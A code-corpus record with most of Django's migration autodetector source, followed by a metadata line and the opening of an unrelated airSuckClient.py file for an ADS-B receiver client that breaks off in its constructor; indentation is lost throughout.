self.new_proxy_keys.append((al, mn))
else:
self.new_model_keys.append((al, mn))
# Renames have to come first
self.generate_renamed_models()
# Prepare field lists, and prepare a list of the fields that used
# through models in the old state so we can make dependencies
# from the through model deletion to the field that uses it.
self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
self.through_users = {}
self.old_field_keys = set()
self.new_field_keys = set()
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
# Through model map generation
for app_label, model_name in sorted(self.old_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
for field_name, field in old_model_state.fields:
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(field_name)
if (hasattr(old_field, "rel") and getattr(old_field.rel, "through", None)
and not old_field.rel.through._meta.auto_created):
through_key = (
old_field.rel.through._meta.app_label,
old_field.rel.through._meta.model_name,
)
self.through_users[through_key] = (app_label, old_model_name, field_name)
# Generate non-rename model operations
self.generate_deleted_models()
self.generate_created_models()
self.generate_deleted_proxies()
self.generate_created_proxies()
self.generate_altered_options()
self.generate_altered_managers()
# Generate field operations
self.generate_renamed_fields()
self.generate_removed_fields()
self.generate_added_fields()
self.generate_altered_fields()
self.generate_altered_unique_together()
self.generate_altered_index_together()
self.generate_altered_db_table()
self.generate_altered_order_with_respect_to()
# Now, reordering to make things possible. The order we have already
# isn't bad, but we need to pull a few things around so FKs work nicely
# inside the same app
for app_label, ops in sorted(self.generated_operations.items()):
# construct a dependency graph for intra-app dependencies
dependency_graph = {op: set() for op in ops}
for op in ops:
for dep in op._auto_deps:
if dep[0] == app_label:
for op2 in ops:
if self.check_dependency(op2, dep):
dependency_graph[op].add(op2)
# we use a stable sort for deterministic tests & general behavior
self.generated_operations[app_label] = stable_topological_sort(ops, dependency_graph)
# Now, we need to chop the lists of operations up into migrations with
# dependencies on each other.
# We do this by stepping up an app's list of operations until we
# find one that has an outgoing dependency that isn't in another app's
# migration yet (hasn't been chopped off its list). We then chop off the
# operations before it into a migration and move onto the next app.
# If we loop back around without doing anything, there's a circular
# dependency (which _should_ be impossible as the operations are all
# split at this point so they can't depend and be depended on)
self.migrations = {}
num_ops = sum(len(x) for x in self.generated_operations.values())
chop_mode = False
while num_ops:
# On every iteration, we step through all the apps and see if there
# is a completed set of operations.
# If we find that a subset of the operations are complete we can
# try to chop it off from the rest and continue, but we only
# do this if we've already been through the list once before
# without any chopping and nothing has changed.
for app_label in sorted(self.generated_operations.keys()):
chopped = []
dependencies = set()
for operation in list(self.generated_operations[app_label]):
deps_satisfied = True
operation_dependencies = set()
for dep in operation._auto_deps:
is_swappable_dep = False
if dep[0] == "__setting__":
# We need to temporarily resolve the swappable dependency to prevent
# circular references. While keeping the dependency checks on the
# resolved model we still add the swappable dependencies.
# See #23322
resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
original_dep = dep
dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
is_swappable_dep = True
if dep[0] != app_label and dep[0] != "__setting__":
# External app dependency. See if it's not yet
# satisfied.
for other_operation in self.generated_operations.get(dep[0], []):
if self.check_dependency(other_operation, dep):
deps_satisfied = False
break
if not deps_satisfied:
break
else:
if is_swappable_dep:
operation_dependencies.add((original_dep[0], original_dep[1]))
elif dep[0] in self.migrations:
operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
else:
# If we can't find the other app, we add a first/last dependency,
# but only if we've already been through once and checked everything
if chop_mode:
# If the app already exists, we add a dependency on the last migration,
# as we don't know which migration contains the target field.
# If it's not yet migrated or has no migrations, we use __first__
if graph and graph.leaf_nodes(dep[0]):
operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
else:
operation_dependencies.add((dep[0], "__first__"))
else:
deps_satisfied = False
if deps_satisfied:
chopped.append(operation)
dependencies.update(operation_dependencies)
self.generated_operations[app_label] = self.generated_operations[app_label][1:]
else:
break
# Make a migration! Well, only if there's stuff to put in it
if dependencies or chopped:
if not self.generated_operations[app_label] or chop_mode:
subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
instance.dependencies = list(dependencies)
instance.operations = chopped
self.migrations.setdefault(app_label, []).append(instance)
chop_mode = False
else:
self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
new_num_ops = sum(len(x) for x in self.generated_operations.values())
if new_num_ops == num_ops:
if not chop_mode:
chop_mode = True
else:
raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
num_ops = new_num_ops
# OK, add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
return self.migrations
def check_dependency(self, operation, dependency):
"""
Returns ``True`` if the given operation depends on the given dependency,
``False`` otherwise.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower() and
any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name_lower == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name_lower == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Field is removed and part of an index/unique_together
elif dependency[2] is not None and dependency[3] == "foo_together_change":
return (
isinstance(operation, (operations.AlterUniqueTogether,
operations.AlterIndexTogether)) and
operation.name_lower == dependency[1].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
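# Editor's note (illustrative, not part of Django): concretely, a dependency
# tuple such as ("myapp", "author", None, True) means "the operation that
# creates model myapp.Author", while ("myapp", "author", "name", False) means
# "the operation that removes field Author.name"; the special fourth values
# "alter", "order_wrt_unset" and "foo_together_change" are matched by
# check_dependency() above.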
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
def generate_renamed_models(self):
"""
Finds any renamed models, and generates the operations for them,
and removes the old entry from the model lists.
Must be run before other model-level generation.
"""
self.renamed_models = {}
self.renamed_models_rel = {}
added_models = set(self.new_model_keys) - set(self.old_model_keys)
for app_label, model_name in sorted(added_models):
model_state = self.to_state.models[app_label, model_name]
model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
removed_models = set(self.old_model_keys) - set(self.new_model_keys)
for rem_app_label, rem_model_name in removed_models:
if rem_app_label == app_label:
rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
if model_fields_def == rem_model_fields_def:
if self.questioner.ask_rename_model(rem_model_state, model_state):
self.add_operation(
app_label,
operations.RenameModel(
old_name=rem_model_state.name,
new_name=model_state.name,
)
)
self.renamed_models[app_label, model_name] = rem_model_name
self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
self.old_model_keys.remove((rem_app_label, rem_model_name))
self.old_model_keys.append((app_label, model_name))
break
def generate_created_models(self):
"""
Find all new models (both managed and unmanaged) and make create
operations for them as well as separate operations to create any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also defer any model options that refer to collections of fields
that might be deferred (e.g. unique_together, index_together).
"""
old_keys = set(self.old_model_keys).union(self.old_unmanaged_keys)
added_models = set(self.new_model_keys) - old_keys
added_unmanaged_models = set(self.new_unmanaged_keys) - old_keys
all_added_models = chain(
sorted(added_models, key=self.swappable_first_key, reverse=True),
sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
)
for app_label, model_name in all_added_models:
model_state = self.to_state.models[app_label, model_name]
model_opts = self.new_apps.get_model(app_label, model_name)._meta
# Gather related fields
related_fields = {}
primary_key_rel = None
for field in model_opts.local_fields:
if field.rel:
if field.rel.to:
if field.primary_key:
primary_key_rel = field.rel.to
elif not field.rel.parent_link:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model_opts.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Are there unique/index_together to defer?
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
# Depend on the deletion of any possible proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Depend on the other end of the primary key if it's a relation
if primary_key_rel:
dependencies.append((
primary_key_rel._meta.app_label,
primary_key_rel._meta.object_name,
None,
True
))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[d for d in model_state.fields if d[0] not in related_fields],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
dependencies=dependencies,
beginning=True,
)
# Don't add operations which modify the database for unmanaged models
if not model_opts.managed:
continue
# Generate operations for each related field
for name, field in sorted(related_fields.items()):
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True
))
# Depend on our own model being created
dependencies.append((app_label, model_name, None, True))
# Make operation
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=name,
field=field,
),
dependencies=list(set(dependencies)),
)
# Generate other operations
related_dependencies = [
(app_label, model_name, name, True)
for name, field in sorted(related_fields.items())
]
related_dependencies.append((app_label, model_name, None, True))
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=unique_together,
),
dependencies=related_dependencies
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=index_together,
),
dependencies=related_dependencies
)
if order_with_respect_to:
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=order_with_respect_to,
),
dependencies=[
(app_label, model_name, order_with_respect_to, True),
(app_label, model_name, None, True),
]
)
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
We use the same statements so that there's less code duplication,
but of course for proxy models we can skip all that pointless field
stuff and just chuck out an operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
def generate_deleted_models(self):
"""
Find all deleted models (managed and unmanaged) and make delete
operations for them as well as separate operations to delete any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also bring forward removal of any model options that refer to
collections of fields - the inverse of generate_created_models().
"""
new_keys = set(self.new_model_keys).union(self.new_unmanaged_keys)
deleted_models = set(self.old_model_keys) - new_keys
deleted_unmanaged_models = set(self.old_unmanaged_keys) - new_keys
all_deleted_models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
for app_label, model_name in all_deleted_models:
model_state = self.from_state.models[app_label, model_name]
model = self.old_apps.get_model(app_label, model_name)
if not model._meta.managed:
# Skip here, no need to handle fields for unmanaged models
continue
# Gather related fields
related_fields = {}
for field in model._meta.local_fields:
if field.rel:
if field.rel.to:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model._meta.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Generate option removal first
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=None,
)
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=None,
)
)
# Then remove each related field
for name, field in sorted(related_fields.items()):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=name,
)
)
# Finally, remove the model.
# This depends on both the removal/alteration of all incoming fields
# and the removal of all its own related fields, and if it's
# a through model the field that references it.
dependencies = []
for related_object in model._meta.related_objects:
related_object_app_label = related_object.related_model._meta.app_label
object_name = related_object.related_model._meta.object_name
field_name = related_object.field.name
dependencies.append((related_object_app_label, object_name, field_name, False))
if not related_object.many_to_many:
dependencies.append((related_object_app_label, object_name, field_name, "alter"))
for name, field in sorted(related_fields.items()):
dependencies.append((app_label, model_name, name, False))
# We're referenced in another field's through=
through_user = self.through_users.get((app_label, model_state.name_lower), None)
if through_user:
dependencies.append((through_user[0], through_user[1], through_user[2], False))
# Finally, make the operation, deduping any dependencies
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
dependencies=list(set(dependencies)),
)
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
def generate_renamed_fields(self):
"""
Works out renamed fields
"""
self.renamed_fields = {}
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Scan to see if this is actually a rename!
field_dec = self.deep_deconstruct(field)
for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
if rem_app_label == app_label and rem_model_name == model_name:
old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
if field.rel and field.rel.to and 'to' in old_field_dec[2]:
old_rel_to = old_field_dec[2]['to']
if old_rel_to in self.renamed_models_rel:
old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
if old_field_dec == field_dec:
if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
self.add_operation(
app_label,
operations.RenameField(
model_name=model_name,
old_name=rem_field_name,
new_name=field_name,
)
)
self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
self.old_field_keys.add((app_label, model_name, field_name))
self.renamed_fields[app_label, model_name, field_name] = rem_field_name
break
def generate_added_fields(self):
"""
Fields that have been added
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
self._generate_added_field(app_label, model_name, field_name)
def _generate_added_field(self, app_label, model_name, field_name):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.rel and field.rel.to:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True,
))
# You can't just add NOT NULL fields with no default or fields
# which don't allow empty strings as default.
preserve_default = True
if (not field.null and not field.has_default() and
not isinstance(field, models.ManyToManyField) and
not (field.blank and field.empty_strings_allowed)):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
preserve_default = False
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self._generate_removed_field(app_label, model_name, field_name)
def _generate_removed_field(self, app_label, model_name, field_name):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an
# order_with_respect_to or index/unique_together operation;
# this is safely ignored if there isn't one
dependencies=[
(app_label, model_name, field_name, "order_wrt_unset"),
(app_label, model_name, field_name, "foo_together_change"),
],
)
def generate_altered_fields(self):
"""
Fields that have been altered.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
# Did the field change?
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(old_field_name)
new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Implement any model renames on relations; these are handled by RenameModel
# so we need to exclude them from the comparison
if hasattr(new_field, "rel") and getattr(new_field.rel, "to", None):
rename_key = (
new_field.rel.to._meta.app_label,
new_field.rel.to._meta.model_name,
)
if rename_key in self.renamed_models:
new_field.rel.to = old_field.rel.to
old_field_dec = self.deep_deconstruct(old_field)
new_field_dec = self.deep_deconstruct(new_field)
if old_field_dec != new_field_dec:
both_m2m = (
isinstance(old_field, models.ManyToManyField) and
isinstance(new_field, models.ManyToManyField)
)
neither_m2m = (
not isinstance(old_field, models.ManyToManyField) and
not isinstance(new_field, models.ManyToManyField)
)
if both_m2m or neither_m2m:
# Either both fields are m2m or neither is
preserve_default = True
if (old_field.null and not new_field.null and not new_field.has_default() and
not isinstance(new_field, models.ManyToManyField)):
field = new_field.clone()
new_default = self.questioner.ask_not_null_alteration(field_name, model_name)
if new_default is not models.NOT_PROVIDED:
field.default = new_default
preserve_default = False
else:
field = new_field
self.add_operation(
app_label,
operations.AlterField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
)
)
else:
# We cannot alter between m2m and concrete fields
self._generate_removed_field(app_label, model_name, field_name)
self._generate_added_field(app_label, model_name, field_name)
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = {
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
}
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
def generate_altered_unique_together(self):
self._generate_altered_foo_together(operations.AlterUniqueTogether)
def generate_altered_index_together(self):
self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_db_table(self):
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_db_table_name = old_model_state.options.get('db_table')
new_db_table_name = new_model_state.options.get('db_table')
if old_db_table_name != new_db_table_name:
self.add_operation(
app_label,
operations.AlterModelTable(
name=model_name,
table=new_db_table_name,
)
)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(
self.kept_proxy_keys
).union(
self.kept_unmanaged_keys
).union(
# unmanaged converted to managed
set(self.old_unmanaged_keys).intersection(self.new_model_keys)
).union(
# managed converted to unmanaged
set(self.old_model_keys).intersection(self.new_unmanaged_keys)
)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if (old_model_state.options.get("order_with_respect_to", None) !=
new_model_state.options.get("order_with_respect_to", None)):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to", None):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to', None),
),
dependencies=dependencies,
)
def generate_altered_managers(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.managers != new_model_state.managers:
self.add_operation(
app_label,
operations.AlterModelManagers(
name=model_name,
managers=new_model_state.managers,
)
)
def arrange_for_graph(self, changes, graph, migration_name=None):
"""
Takes in a result from changes() and a MigrationGraph,
and fixes the names and dependencies of the changes so they
extend the graph from the leaf nodes for each app.
"""
leaves = graph.leaf_nodes()
name_map = {}
for app_label, migrations in list(changes.items()):
if not migrations:
continue
# Find the app label's current leaf node
app_leaf = None
for leaf in leaves:
if leaf[0] == app_label:
app_leaf = leaf
break
# Do they want an initial migration for this app?
if app_leaf is None and not self.questioner.ask_initial(app_label):
# They don't.
for migration in migrations:
name_map[(app_label, migration.name)] = (app_label, "__first__")
del changes[app_label]
continue
# Work out the next number in the sequence
if app_leaf is None:
next_number = 1
else:
next_number = (self.parse_number(app_leaf[1]) or 0) + 1
# Name each migration
for i, migration in enumerate(migrations):
if i == 0 and app_leaf:
migration.dependencies.append(app_leaf)
if i == 0 and not app_leaf:
new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
else:
new_name = "%04i_%s" % (
next_number,
migration_name or self.suggest_name(migration.operations)[:100],
)
name_map[(app_label, migration.name)] = (app_label, new_name)
next_number += 1
migration.name = new_name
# Now fix dependencies
for app_label, migrations in changes.items():
for migration in migrations:
migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
but we put some effort in to the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name_lower
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name_lower
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name_lower for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
if re.match(r"^\d+_", name):
return int(name.split("_")[0])
return None
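# Editor's illustrative sketch (not part of Django): the block below shows
# roughly how the makemigrations command drives MigrationAutodetector. It
# assumes DJANGO_SETTINGS_MODULE points at a configured project; all names
# used are standard Django 1.8-era imports.
if __name__ == "__main__":
    import django
    django.setup()
    from django.apps import apps
    from django.db import connection
    from django.db.migrations.loader import MigrationLoader
    from django.db.migrations.state import ProjectState
    # Load the on-disk migrations and compare the state they produce with
    # the state described by the currently installed models.
    loader = MigrationLoader(connection)
    autodetector = MigrationAutodetector(
        loader.project_state(),        # from_state: existing migrations
        ProjectState.from_apps(apps),  # to_state: current model definitions
    )
    changes = autodetector.changes(graph=loader.graph)
    for app_label, app_migrations in changes.items():
        print("%s -> %s" % (app_label, [m.name for m in app_migrations]))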
| bsd-3-clause |
ThreeSixes/airSuck | airSuckClient.py | 1 | 41255 | #!/usr/bin/python
"""
airSuckClient by ThreeSixes (https://github.com/ThreeSixes)
This project is licensed under GPLv3. See COPYING for details.
This file is part of the airSuck project (https://github.com/ThreeSixes/airSUck).
"""
###########
# Imports #
###########
try:
import config
except:
raise IOError("No configuration present. Please copy config/config.py to the airSuck folder and edit it.")
# Load the config _very_ early.
asConfig = config.airSuckClientSettings
# If we have an attached GPS...
if asConfig['gps']:
# Do GPS things.
from gps import *
import datetime
import json
import re
import socket
import time
import threading
import traceback
import Queue
import atexit
import signal
import sys
import errno
from libAirSuck import asLog
from subprocess import Popen, PIPE, STDOUT
from pprint import pprint
#########################
# dump1090Handler class #
#########################
class airSuckClient():
# Class constructor
def __init__(self):
"""
dump1090Handler manages the dump1090 executable used to grab ADS-B data and makes sure it's running. If the process jams, it is restarted.
"""
# Init message.
logger.log("Init airSuckClient...")
# Build the command we need to run dump1090 in a fashion Popen can understand.
self.popenCmd = [asConfig['dump1090Path']] + asConfig['dump1090Args'].split(" ")
# Pre-compiled regex used to verify dump1090 ADS-B data.
self.__re1090 = re.compile("[@*]([a-fA-F0-9])+;")
#self.__re1090Mlat = re.compile("[@*]([a-fA-F0-9])+;")
# Watchdog setup.
self.__myWatchdog = None
self.__lastADSB = 0
self.__watchdog1090Restart = False
self.__lastSrvKeepalive = 0
self.__keepAliveTimer = 0
self.__maxTimeSrv = 2.0 * asConfig['keepaliveInterval']
self.__keepaliveJSON = "{\"keepalive\": \"abcdef\"}"
# Backoff counters
self.__backoff1090 = 1.0
self.__backoffSrv = 1.0
# Networking.
self.__serverSock = None
self.__serverConnected = False
self.__rxBuffSz = 128
# Should we keep going?
self.__keepRunning = True
# Queue worker running?
self.__queueWorkerRunning = False
# RX watcher running?
self.__rxWatcherRunning = False
# Dump1090 running?
self.__dump1090Running = False
# Global dump1090 process holder.
self.__proc1090 = None
# GPSD stuff...
# Do we have an initial position?
self.__gpsdData = False
# Is there anything prohibiting the start of the GPS worker?
